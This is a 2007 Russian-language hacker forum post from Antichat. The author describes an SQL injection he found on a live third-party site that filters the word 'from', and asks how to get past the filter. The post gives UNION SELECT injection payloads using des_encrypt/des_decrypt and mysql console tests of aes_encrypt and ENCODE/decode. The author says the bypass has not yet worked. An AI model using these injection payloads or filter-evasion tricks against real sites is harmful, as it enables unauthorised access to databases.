ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу обход фильтрации запрещённых слов в MySql
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

обход фильтрации запрещённых слов в MySql
  #1  
Старый 22.12.2007, 15:00
Аватар для AFoST
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
Cool обход фильтрации запрещённых слов в MySql
Капался на просторах интернета и наткнулся на скул. Инъекция, как инъекция, даже ковычки не экранируются, но вот косяк, что фильтруется слово from. Ну и стал думать, как можно обойти фильтрацию. Долго не думал, потому что нечто подобное уже делали с пхп. Надо как-то зашифровать и потом расшифровать строку. Чем я и занялся. Покопался на разных ресурсах по MySQL и нашел несколько функций кодировки/декодировки строк. Начал экспериментировать. На моё удивление получилось следующее:
при подстановке
PHP код:
-1+union+select+des_encrypt(database(),'3')+/* 
выводилась строка "яcЌцI{ПџwЊ)яVeЖ…" далее подставляя
PHP код:
-1+union+select+des_decrypt('яcЌцI{ПџwЊ)яVeЖ…','3')+/* 
На экране появлялась версия дб...
Поэкпериментировав на локальном серве денвера получил следующее

PHP код:
mysqlselect aes_encrypt(version(),'12');
+-----------------------------+
aes_encrypt(version(),'12') |
+-----------------------------+
| └/Ь0⌂Ва{ў_wВ╢ьДО            |
+-----------------------------+
1 row in set (0.00 sec)

mysqlselect aes_decrypt('└/Ь0⌂Ва{ў_wВ╢ьДО','12');
+--------------------------------------+
aes_decrypt('└/Ь0⌂Ва{ў_wВ╢ьДО','12') |
+--------------------------------------+
4.1.16-max                           |
+--------------------------------------+
1 row in set (0.00 sec)

mysqlselect ENCODE(user(),'2');
+--------------------+
ENCODE(user(),'2') |
+--------------------+
рL♂3М▬Яч╣,↓Gєs     |
+--------------------+
1 row in set (0.00 sec)

mysqlselect decode('рL♂3М▬Яч╣,↓Gєs','2');
+------------------------------+
decode('рL♂3М▬Яч╣,↓Gєs','2') |
+------------------------------+
ODBC@localhost               |
+------------------------------+
1 row in set (0.00 sec)

mysql
Главное не потерять ни одного символа. Но цели я своей так и не добился, нифига пока не обошёл фильтрацию...Вот собственно вопрос: КАК?!!??! Как это можно использовать?
Последний раз редактировалось AFoST; 22.12.2007 в 15:58..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Эффективные Слепые Иньекции Евгений Минаев Авторские статьи 10 31.05.2008 09:43
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41
Обход регистрации в Invision Power Board v1.3 Final DeeIP Форумы 1 10.04.2005 20:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ